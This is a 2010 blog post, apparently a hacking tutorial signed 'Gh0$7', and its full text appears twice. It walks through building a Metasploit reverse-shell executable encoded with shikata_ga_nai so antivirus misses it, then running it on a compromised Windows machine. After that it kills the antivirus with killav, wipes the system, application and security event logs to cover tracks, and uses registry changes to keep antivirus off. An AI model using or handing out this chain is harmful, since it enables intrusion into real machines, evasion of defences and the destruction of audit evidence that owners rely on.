0
What Antivirus?
15 July 2010
So far i have covered some of the basics for a few different things such as metasploit, and web injection attacks. Now im going to cover antivirus bypass with metasploit. Many of you understand encryption, and encoding through the use of certain tools encoding can be used through the metasploit framework to hide your payload from the antivirus software through a few commands.
1)Lets check out the help menu for the encoding section --> ./msfencode -h
2)Now let's see what kind of encoding is offered --> ./msfencode -l
3)The first thing that we need to do is pick our payload, i recommend /windows/shell/reverse_tcp. Not only does this one offer less code that can be detected by the av software, most of it actually loads into memory. With the next command i will show you, metasploit will create an encoded executable so if you want to get creative you can actually create a batch file or whatever that autoruns the script at startup just in case the computer gets rebooted.
4)The command --> ./msfpayload windows/shell/reverse_tcp LHOST=your local ip LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai > tmp/myFile.exe (this can be what ever directory you have in your msf path, and you can name the file whatever you want dot exe).
5)Upload the file to the exploited machine, drop to a shell, and execute it. Thats it, or was it? Go back to the meterpreter prompt! --> ctrl-c
6)Lets have some fun with the av software, so you want to kill it so you cant be detected? --> run killav
7)Lets clear some event logs so we can cover our tracks a bit --> irb (this will drop us to an irb shell so we can do what we do)
8)now to clear the system logs --> log = client.sys.eventlog.open('system') --> log.clear
9)Application logs --> log = client.sys.eventlog.open('application') --> log.clear
10)Security --> log = client.sys.eventlog.open('security') --> log.clear
11)Now you have an encoded payload connected back to your machine, and you have mangled the av software until reboot you can get creative and actually write a script that will disable the av on startup, this way it wont detect anything else you might possibly want to do while you are pentesting the machine. I suggest modifying the registry, this would be the safest bet, and easiest to hide.
Gh0$7
1)Lets check out the help menu for the encoding section --> ./msfencode -h
2)Now let's see what kind of encoding is offered --> ./msfencode -l
3)The first thing that we need to do is pick our payload, i recommend /windows/shell/reverse_tcp. Not only does this one offer less code that can be detected by the av software, most of it actually loads into memory. With the next command i will show you, metasploit will create an encoded executable so if you want to get creative you can actually create a batch file or whatever that autoruns the script at startup just in case the computer gets rebooted.
4)The command --> ./msfpayload windows/shell/reverse_tcp LHOST=your local ip LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai > tmp/myFile.exe (this can be what ever directory you have in your msf path, and you can name the file whatever you want dot exe).
5)Upload the file to the exploited machine, drop to a shell, and execute it. Thats it, or was it? Go back to the meterpreter prompt! --> ctrl-c
6)Lets have some fun with the av software, so you want to kill it so you cant be detected? --> run killav
7)Lets clear some event logs so we can cover our tracks a bit --> irb (this will drop us to an irb shell so we can do what we do)
8)now to clear the system logs --> log = client.sys.eventlog.open('system') --> log.clear
9)Application logs --> log = client.sys.eventlog.open('application') --> log.clear
10)Security --> log = client.sys.eventlog.open('security') --> log.clear
11)Now you have an encoded payload connected back to your machine, and you have mangled the av software until reboot you can get creative and actually write a script that will disable the av on startup, this way it wont detect anything else you might possibly want to do while you are pentesting the machine. I suggest modifying the registry, this would be the safest bet, and easiest to hide.
Gh0$7
